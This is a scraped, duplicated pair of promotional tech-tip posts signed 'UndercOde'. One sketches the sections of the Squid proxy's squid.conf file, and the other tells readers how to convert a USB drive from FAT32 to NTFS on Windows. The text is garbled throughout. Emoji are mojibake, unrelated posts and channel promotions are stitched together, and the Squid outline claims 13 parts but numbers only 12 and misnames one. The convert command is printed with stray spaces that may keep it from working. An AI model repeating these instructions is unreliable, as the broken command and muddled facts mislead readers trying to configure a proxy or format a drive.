Let βs take a look at the structure of the squid.conf file and some commonly used options: The
squid.conf configuration file can be divided into 13 parts, these 13 parts are:
1) NETWORK OPTIONS (relevant network options)
2)OPTIONS WHICH AFFECT THE NEIGHBOR SELECTION ALGORITHM (relevant options for the neighbor selection algorithm)
3) OPTIONS WHICH AFFECT THE CACHE SIZE (relevant options that define the size of the cache)
4) LOGFILE PATHNAMES AND CACHE DIRECTORIES Directory)
5) OPTIONS FOR EXTERNAL SUPPORT PROGRAMS (external support program options)
6) OPTIONS the FOR TUNING THE CACHE (cache adjustment option)
7) TIMEOUTS (timeout)
8) ACCESS CONTROLS (access control)
9) ADMINISTRATIVE the PARAMETERS (management parameters)
10) OPTIONS FOR THE CACHE REGISTRATION SERVICE (cache registration service option)
11) HTTPD-ACCELERATOR OPTIONS (
MISD acceleration option) 12. MISCELLANEOUS (miscellaneous)
12) DELAY POOL PARAMETERS (delay pool parameters)
Although the configuration file of Squid is very large, but You only provide proxy services for a small and medium network, and you are only going to use one server, then you only need to modify a few options in the configuration file.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ Configuration and applicacommon configuration options
because the default configuration file in question, we must first amend the contents of the configuration file in order to allow squid up and running.
instagram.com/UndercOdeTestingCompany
Let βs take a look at the structure of the squid.conf file and some commonly used options: The
squid.conf configuration file can be divided into 13 parts, these 13 parts are:
1) NETWORK OPTIONS (relevant network options)
2)OPTIONS WHICH AFFECT THE NEIGHBOR SELECTION ALGORITHM (relevant options for the neighbor selection algorithm)
3) OPTIONS WHICH AFFECT THE CACHE SIZE (relevant options that define the size of the cache)
4) LOGFILE PATHNAMES AND CACHE DIRECTORIES Directory)
5) OPTIONS FOR EXTERNAL SUPPORT PROGRAMS (external support program options)
6) OPTIONS the FOR TUNING THE CACHE (cache adjustment option)
7) TIMEOUTS (timeout)
8) ACCESS CONTROLS (access control)
9) ADMINISTRATIVE the PARAMETERS (management parameters)
10) OPTIONS FOR THE CACHE REGISTRATION SERVICE (cache registration service option)
11) HTTPD-ACCELERATOR OPTIONS (
MISD acceleration option) 12. MISCELLANEOUS (miscellaneous)
12) DELAY POOL PARAMETERS (delay pool parameters)
Although the configuration file of Squid is very large, but You only provide proxy services for a small and medium network, and you are only going to use one server, then you only need to modify a few options in the configuration file.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β ββ
π¦ From Under Code Report 2020 All Good Python Official Scripts Termux - Linux are sended Successfully Will send Their New Release Soon..
You can search chats Or Dm @UNDERCodeOfficial To forward, or new undercode posts
You can search chats Or Dm @UNDERCodeOfficial To forward, or new undercode posts
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fix issue want for your disk copy file is too large [breakthrough ideas]
t.me/UnderCodeTesting
Because the computer system handles the problem of too large copy files on u disks, many people will not operate, so this tut. to help you solve the problem of too large files copied on u disks.
So how should you deal with the large files copied on u disks?
> First, insert the USB disk we need to convert the format, and check the drive letter assigned to the USB disk in the computer
> Next, open the start menu, click the run option, and enter the command cmd Then press the Enter key, and then a dos window with a black background will appear on the screen
π¦ ππΌππ πππΈβπ :
1) First, insert the USB flash drive we need to convert the format, and check the drive letter assigned to the USB drive in the computer
2) Next, open the start menu, click the run option, enter the command cmd and press the Enter key, and then a dos window
3) Then we enter a string of code like this in the window:
"Convert X: / fs: ntfs" (excluding quotes), where X represents the drive letter currently occupied by the USB drive we need to convert. After the input is completed, press the Enter key to start the USB drive format conversion. As shown below:
4) After the conversion is complete, if we observe the attributes of the USB disk, we will find that the file system format of the USB disk has been successfully converted from fat32 to ntfs
5)now can copy the large file to usb without any error
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fix issue want for your disk copy file is too large [breakthrough ideas]
t.me/UnderCodeTesting
Because the computer system handles the problem of too large copy files on u disks, many people will not operate, so this tut. to help you solve the problem of too large files copied on u disks.
So how should you deal with the large files copied on u disks?
> First, insert the USB disk we need to convert the format, and check the drive letter assigned to the USB disk in the computer
> Next, open the start menu, click the run option, and enter the command cmd Then press the Enter key, and then a dos window with a black background will appear on the screen
π¦ ππΌππ πππΈβπ :
1) First, insert the USB flash drive we need to convert the format, and check the drive letter assigned to the USB drive in the computer
2) Next, open the start menu, click the run option, enter the command cmd and press the Enter key, and then a dos window
3) Then we enter a string of code like this in the window:
"Convert X: / fs: ntfs" (excluding quotes), where X represents the drive letter currently occupied by the USB drive we need to convert. After the input is completed, press the Enter key to start the USB drive format conversion. As shown below:
4) After the conversion is complete, if we observe the attributes of the USB disk, we will find that the file system format of the USB disk has been successfully converted from fat32 to ntfs
5)now can copy the large file to usb without any error
β β β ο½ππ»βΊπ«Δπ¬πβ β β β